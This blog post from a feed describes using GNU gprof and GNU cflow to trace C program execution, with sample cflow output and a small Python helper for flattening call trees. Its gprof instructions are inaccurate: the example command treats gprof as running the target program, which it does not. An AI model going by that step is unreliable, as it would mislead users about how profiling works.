<p>GNU gprof, or GNU profiler, is a tool typically used to measure the performance and runtime (not algorithmic complexity) of a program&#8217;s components. When using gprof, compile your target program with flags &#8216;-g -pg&#8217;. That will compile the program with debugging symbols, and add extra code that can generate profiling information. If you need to use gprof on a port or an existing application that uses the standard GNU building toolchain, just add &#8216;-g -pg&#8217; to CFLAGS inside the Makefile. Also, look for lines where the program gets linked, as that needs &#8216;-g -pg&#8217; as well. Then, use gprof to execute the program with the arguments that you will want to profile, e.g. &#8216;<code>gprof ./ltrace /bin/ls 2>/dev/null > ltrace_gprof.out</code>&#8216;. That will create a file, ltrace_gprof.out, that will contain all procedures that were executed and all procedures called from them. This simplifies tracing code for a specific execution of a binary. By passing the required arguments, you are crafting the execution path to your liking. While I did not use gprof to profile, I did use it to trace the execution in a more-or-less high-level fashion.</p>
<p>The second tool I want to write about is GNU cflow. cflow, which I&#8217;m sure everyone except me knew about, takes a number of C files and generates a graph of the function call hierarchy. It is very useful for seeing how a program executes, in a static fashion. One can just call &#8216;<code>cflow -X *.c</code>&#8216; and look at a pstree-like representation of the call graph. In my opinion, it is very useful for understanding the flow of a program. Here is some sample output:</p>
<pre>
77                      fopen {}
78                      fgets {}
79                      process_line {read_config_file.c 112}
80                              debug_ ... {62}
81                              eat_spaces {read_config_file.c 70}
82                              str2type {read_config_file.c 55}
83                                      strlen {}
84                                      strncmp {}
85                                      index {}
86                              start_of_arg_sig {read_config_file.c 81}
87                                      strlen {}
88                              output_line ... {66}
</pre>
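<p>If the indented listing gets long, it can help to flatten it into caller/callee pairs. The Python sketch below does that for output shaped like the sample above. It is an assumption-laden helper, not a cflow feature: it expects every line to start with a number of the same width and relies purely on indentation depth.</p>

```python
import re


def call_edges(listing):
    """Return (caller, callee) pairs from an indented, numbered call tree."""
    edges = []
    stack = []  # (indent width, function name) for the current caller chain
    for line in listing.splitlines():
        match = re.match(r"\s*\d+(\s+)(\w+)", line)
        if match is None:
            continue
        indent = len(match.group(1))
        name = match.group(2)
        # Drop entries at the same depth or deeper; what remains is the caller.
        while stack and stack[-1][0] >= indent:
            stack.pop()
        if stack:
            edges.append((stack[-1][1], name))
        stack.append((indent, name))
    return edges


sample = "\n".join([
    "79    process_line {read_config_file.c 112}",
    "80        eat_spaces {read_config_file.c 70}",
    "81        str2type {read_config_file.c 55}",
    "82            strlen {}",
])
for caller, callee in call_edges(sample):
    print(caller, "calls", callee)
```

<p>Entries at the shallowest depth in the listing have no caller within it, so they produce no pair of their own.</p>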
<p>Why am I playing with these tools? To complete a piece of code that has stagnated at 80% completion, or so I think. More info on the tool, along with complete source, will follow once I get it to some working state.</p>
]]></content:encoded>
			<wfw:commentRss>http://isisblogs.poly.edu/2007/02/06/tools-for-implicit-code-understanding/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by/3.0/us/</creativeCommons:license>
	</item>
	</channel>
</rss>
